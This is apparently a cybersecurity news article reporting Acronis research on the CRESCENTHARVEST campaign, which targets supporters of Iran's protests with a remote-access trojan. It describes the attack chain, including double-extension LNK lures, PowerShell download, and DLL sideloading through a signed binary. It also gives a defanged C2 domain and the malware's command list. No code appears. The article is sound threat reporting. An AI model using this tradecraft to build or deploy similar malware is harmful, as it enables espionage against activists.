CRESCENTHARVEST Campaign Targets Iran Protest Supporters With RAT Malware

Source: The Hacker News

Ravie Lakshmanan
Feb 19 2026 – Cyber Espionage / Data Security

Cybersecurity researchers have disclosed details of a new campaign dubbed CRESCENTHARVEST, likely targeting supporters of Iran’s ongoing protests to conduct information theft and long‑term espionage.

The Acronis Threat Research Unit (TRU) said it observed the activity after January 9. The attacks are designed to deliver a malicious payload that serves as a remote‑access trojan (RAT) and information stealer to execute commands, log keystrokes, and exfiltrate sensitive data. It is currently not known if any of the attacks were successful.

“The campaign exploits recent geopolitical developments to lure victims into opening malicious .LNK files disguised as protest‑related images or videos,” researchers Subhajeet Singha, Eliad Kimhy, and Darrel Virtusio said in a report published this week.
“These files are bundled with authentic media and a Farsi‑language report providing updates from ‘the rebellious cities of Iran.’ This pro‑protest framing appears to be intended to increase credibility and to attract Farsi‑speaking Iranians seeking protest‑related information.”
—Acronis report

CRESCENTHARVEST, although unattributed, is believed to be the work of an Iran‑aligned threat group. The discovery makes it the second such campaign identified as going after specific individuals in the aftermath of the nationwide protests in Iran that began toward the end of 2025.

Last month, French cybersecurity company HarfangLab detailed a threat cluster dubbed RedKitten that targeted non‑governmental organizations and individuals documenting recent human‑rights abuses in Iran, aiming to infect them with a custom backdoor known as SloppyMIO.
—RedKitten article

According to Acronis, the exact initial‑access vector used to distribute the malware is not known. However, it is suspected that the threat actors rely on spear‑phishing or “protracted social‑engineering efforts,” in which operators build rapport with victims over time before sending the malicious payloads.

It is worth noting that Iranian hacking groups such as Charming Kitten and Tortoiseshell have a storied history of engaging in sophisticated social‑engineered attacks that involve:

• Approaching prospective targets under fake personas.
• Cultivating relationships that can stretch for years.
• Weaponising that trust to deliver malware.

“The use of Farsi language content for social engineering and the distributed files depicting the protests in heroic terms suggest an intent to attract Farsi‑speaking individuals of Iranian origin, who are in support of the ongoing protests,” the Swiss‑based security company noted.

Attack chain

1. Malicious RAR archive – Claims to contain information related to the Iranian protests (images, videos) and includes two Windows shortcut (.lnk) files that masquerade as an image or video using the double‑extension trick (*.jpg.lnk or *.mp4.lnk).

2. Execution – When the shortcut is launched, PowerShell code retrieves another ZIP archive while simultaneously opening a harmless image/video, tricking the victim into thinking the file is benign.

3. ZIP payload – Contains a legitimate Google‑signed binary (software_reporter_tool.exe, part of Chrome’s cleanup utility) and several DLLs, including two rogue libraries that are sideloaded by the executable:

   • urtcbased140d_d.dll – A C++ implant that extracts and decrypts Chrome’s app‑bound encryption keys via COM interfaces. It shares overlaps with the open‑source project ChromElevator.
   • version.dll (aka CRESCENTHARVEST) – A remote‑access tool that:
     • Lists installed antivirus products and security tools.
     • Enumerates local user accounts.
     • Loads additional DLLs.
     • Harvests system metadata, browser credentials, Telegram Desktop account data, and keystrokes.

CRESCENTHARVEST employs Windows WinHTTP APIs to communicate with its command‑and‑control (C2) infrastructure, completing the espionage loop.

Command‑and‑Control (C2) Server
servicelog‑information[.]com – used to blend malicious traffic with regular network activity.

Supported Commands

• Anti – run anti‑analysis checks
• His – steal browser history
• Dir – list directories
• Cwd – get the current working directory
• Cd – change directory
• GetUser – retrieve user information
• ps – execute PowerShell commands (currently not working)
• KeyLog – activate keylogger
• Tel_s – steal Telegram session data
• Cook – steal browser cookies
• Info – collect system information
• F_log – steal browser credentials
• Upload – upload files
• shell – run shell commands

“The CRESCENTHARVEST campaign represents the latest chapter in a decade‑long pattern of suspected nation‑state cyber‑espionage operations targeting journalists, activists, researchers, and diaspora communities globally,” Acronis said. “Much of what we observed in CRESCENTHARVEST reflects well‑established tradecraft: LNK‑based initial access, DLL side‑loading through signed binaries, credential harvesting and social engineering aligned to current events.”

---

Stay Informed
Find more exclusive content by following us:

• Google News
• Twitter
• LinkedIn